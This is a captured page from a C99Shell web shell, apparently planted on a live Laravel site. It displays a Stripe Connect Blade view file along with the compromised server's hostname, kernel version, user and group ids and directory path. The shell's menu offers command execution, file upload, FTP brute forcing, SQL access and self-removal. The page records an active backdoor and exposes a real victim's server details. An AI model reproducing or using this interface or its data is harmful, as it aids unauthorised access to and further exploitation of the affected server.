!C99Shell v. 2.5 [PHP 8 Update] [24.05.2025]!

Software: Apache. PHP/8.1.30 

uname -a: Linux server1.tuhinhossain.com 5.15.0-151-generic #161-Ubuntu SMP Tue Jul 22 14:25:40 UTC
2025 x86_64
 

uid=1002(picotech) gid=1003(picotech) groups=1003(picotech),0(root)  

Safe-mode: OFF (not secure)

/home/picotech/domains/wataxi.picotech.app/public_html/storage/framework/views/   drwxrwsr-t
Free 29.34 GB of 117.98 GB (24.87%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Self remove    Logout    


Viewing file:     a36af3eafc42f7462fbca219c816ecb6557f9421.php (1.67 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<!-- Fee Info -->
<div class="col-6">
    <div class="card  bg-secondary shadow">
        <div class="card-header border-0">
            <div class="row align-items-center">
                <div class="col-8">
                    <h3 class="mb-0"><?php echo e(__('Stripe connect')); ?></h3>
                </div>
                <div class="col-4 text-right">
                </div>
            </div>
        </div>
        <div class="card-body">
         <p>
             <?php echo e(__('We use Stripe to collect payments. Connect now, and we will send your funds from cart payments dirrectly to your Stripe account')); ?>.<br />
             <hr />
             <?php if(!auth()->user()->stripe_account): ?>
                <a href="<?php echo e(route('stripe.connect')); ?>" class="btn btn-primary"><?php echo e(__('Connect with Stripe Connect')); ?></a>
             <?php else: ?>

             <div class="row">
                 <div class="col-md-6">
                    <h4><?php echo e(__('Stripe account')); ?></h4>
                    <?php echo e(auth()->user()->stripe_account); ?>

                 </div>
                 <div class="col-md-6">
                    <h4><?php echo e(__('Stripe details submited')); ?></h4>
                    <?php echo e($stripe_details_submitted); ?>

                 </div>
             </div>
             <br />
             <a href="<?php echo e(route('stripe.connect')); ?>" class="btn btn-warning"><?php echo e(__('Update Stripe connection')); ?></a>
             <?php endif; ?>
        </p>
        </div>
    </div>
</div><?php /**PATH /home/picotech/domains/wataxi.picotech.app/public_html/resources/views/finances/stripe.blade.php ENDPATH**/ ?>

:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v. 2.5 [PHP 8 Update] [24.05.2025] | Generation time: 0.0047 ]--